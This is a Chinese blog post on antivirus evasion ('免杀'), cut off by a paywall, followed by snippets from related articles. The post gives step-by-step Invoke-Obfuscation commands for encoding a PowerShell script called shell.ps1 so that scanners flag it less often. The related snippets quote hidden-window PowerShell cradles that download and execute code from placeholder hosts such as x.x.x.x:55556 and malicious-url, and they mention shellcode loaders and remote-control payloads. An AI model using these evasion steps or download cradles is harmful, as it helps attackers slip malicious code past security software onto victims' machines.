【免杀】powershell

原创

已于 2023-06-28 19:52:00 修改 · 357 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

于 2023-06-24 18:32:07 首次发布

该文章介绍了如何下载并使用Invoke-Obfuscation工具对Powershell脚本进行混淆处理，以避开某些浏览器的检测。尽管这种方法可能使脚本在某些扫描服务如Virscan和VirusTotal上的报毒率较低，但并不是所有安全软件都能绕过这种混淆技术。

下载Invoke-Obfuscation:https://github.com/danielbohannon/Invoke-Obfuscation
进入Invoke-Obfuscation目录，在powershell中执行

Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation

如果报错，在管理员权限下powershell执行

set-ExecutionPolicy RemoteSigned
y

set scriptpath C:\Users\Admin\Desktop\shell.ps1
设置要混淆的脚本位置
 encoding
 选择混淆方法
 1
 选择编码方式
 out shell.ps1
 输出为文件

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

逢星

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Apache Flink (最新版本) 远程代码执行

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

05-04

1089

路虽远，行则将至；事虽难，做则必成

PowerShell免杀上线远控(可二开cs,生成即免杀)

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

08-16

1640

我翻开历史一查，这历史没有年代，歪歪斜斜的每页上都写着“仁义道德”几个字。我横竖睡不着，仔细看了半夜，才从字缝里看出字来，满本都写着两个字是“吃人”

1 条评论您还未登录，请先登录后发表或查看评论

Powershell免杀

土豆的博客

07-08

954

目录 Somethingu have to know： 0x01调用混淆 0x02别名混淆 0x03转义符混淆 0x04 拆分混淆 0x05 例子 Somethingu have to know： ps1代码自身免杀，但在用powershell执行远程下载或执行shellcode时，很容易触发杀软行为规则，查杀主要靠行为检测，powershell混淆姿势有很多，如字符串转换、变量转换、编码、压缩等等。都是根据powershell语言的特性来混淆代码，从而绕过杀软。...

PowerShell远程下载文件命令大全

最新发布

Bruce_xiaowei的博客

10-30

359

PowerShell提供了多种远程下载文件的方法，包括基础下载命令(Invoke-WebRequest、WebClient)、高级下载选项(带进度显示、下载字符串)、认证设置(Basic认证、自定义请求头)、BITS后台传输服务，以及处理HTTPS证书的方法。特别提供了实用下载函数和批量下载函数模板，方便日常使用。这些命令适用于系统管理、文件传输和渗透测试等场景，其中Invoke-WebRequest是最推荐的标准方法，BITS适合大文件后台下载，而WebClient则提供更多底层控制。注意某些命令可能需要

powershell免杀详解

m0_57836225的博客

08-20

1634

也可以使用 `IEX (Invoke-WebRequest -Uri 'http://malicious-url/script.txt' -UseBasicParsing).Content`，通过 `Invoke-WebRequest`获取远程脚本内容并执行。- 解释：PowerShell 模块是一种组织和封装 PowerShell 代码的方式，`.psm1`文件包含函数、变量、别名等，可以将一组相关的功能打包在一起，以便在多个脚本中重复使用，提高代码的可维护性和可重用性。

【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】_yetanotherobfuscator

2401_84969340的博客

05-13

577

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！

【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】

AA8j的博客

07-06

2788

0x01 项目地址 https://github.com/danielbohannon/Invoke-Obfuscation 0x02 用法生成powershell： powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))" 下载并用powershell进入项目目录执行：Import-Module .\Invoke-Obfuscati

免杀------代替powershell执行语句免杀

m0_60571990的博客

11-08

407

免杀------代替powershell执行语句免杀

免杀-PowerShell

weixin_58782362的博客

11-20

940

win自带defender杀毒工具，所以defender和powershell用的同一种语言，很容易被查杀，所以我们尽量就不要用powershell。如果是powershell脚本，只要对方执行就能上线，如果是cmd，先输入powershell，然后payload.ps1。2、执行模式-直接执行命令（有上线代码），最好别在powershell终端执行，容易出错。1、直接在base64编码上添加，然后将垃圾数据替换为空，最后进行解码。混淆、手工混淆，将内容进行base64编码，然后进行解码。

利用powershell进行免杀

PortugalCR7的博客

06-29

311

利用Invoke Obfuscation进行混淆。查看powershell的版本号（）

免杀 | powershell免杀的几种简单方式

weixin_66717977的博客

03-13

1077

免杀对抗 | powershell免杀 | 免杀技术

我的powershell免杀之路

mingyqf的博客

05-17

2216

我的powershell免杀之路原创 tubai

powershell分离免杀

m0_57836225的博客

08-14

1130

(new-object net.webclient).downloadstring('http://x.x.x.x/a')` ：创建一个 `Net.WebClient` 对象，然后使用 `DownloadString` 方法从指定的 `http://x.x.x.x/a` 网址下载字符串内容，并通过 `IEX` 立即执行该下载的字符串内容。1. 信息窃取 - 一旦恶意的 PowerShell 脚本在系统中执行，它可以窃取敏感信息，如用户的登录凭证、文件内容等，并将这些信息发送给攻击者。

PowerShell命令免杀思路

qq_44657899的博客

11-08

1861

文章目录前言大小写管道符修改函数名命令拆分反引号处理低版本powershell使用Out-EncryptedScript加密免杀base64免杀组合拳前言 UNIX 系统一直有着功能强大的壳程序（shell），Windows PowerShell 的诞生就是要提供功能相当于 UNIX 系统的命令行壳程序（例如：sh、bash 或 csh），同时也内置脚本语言以及辅助脚本程序的工具，使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 powershell 具有在硬盘中易绕过，内存中

powershell下shellcode分离免杀

m0_57836225的博客

08-07

297

在这种情境下，可能会将 shellcode 存储在一个相对隐蔽的位置（如网络上的远程服务器、本地的加密文件等），而 PowerShell 脚本在运行时通过特定的方式获取并执行这段 shellcode。通过分离存储和巧妙的执行方式，试图绕过常见的安全检测机制，实现免杀效果，即避免被杀毒软件、入侵检测系统等安全防护工具识别和阻止。“shellcode”通常是一段精心编写的机器代码，用于执行特定的恶意操作，如获取系统权限、窃取数据等。

powershell免杀思路(超细)

技术超强的网络安全平台

12-17

217

由于付费无法转载请查看请参看： https://forum.butian.net/share/936

如何生成免杀的powershell

08-27

### 生成免杀 PowerShell 脚本的策略为了生成不会被安全软件轻易检测到的 PowerShell 脚本，可以采用多种混淆和执行策略，结合行为规避和代码混淆技术，使脚本在执行过程中更难以被识别为恶意行为。 #### 1. 使用...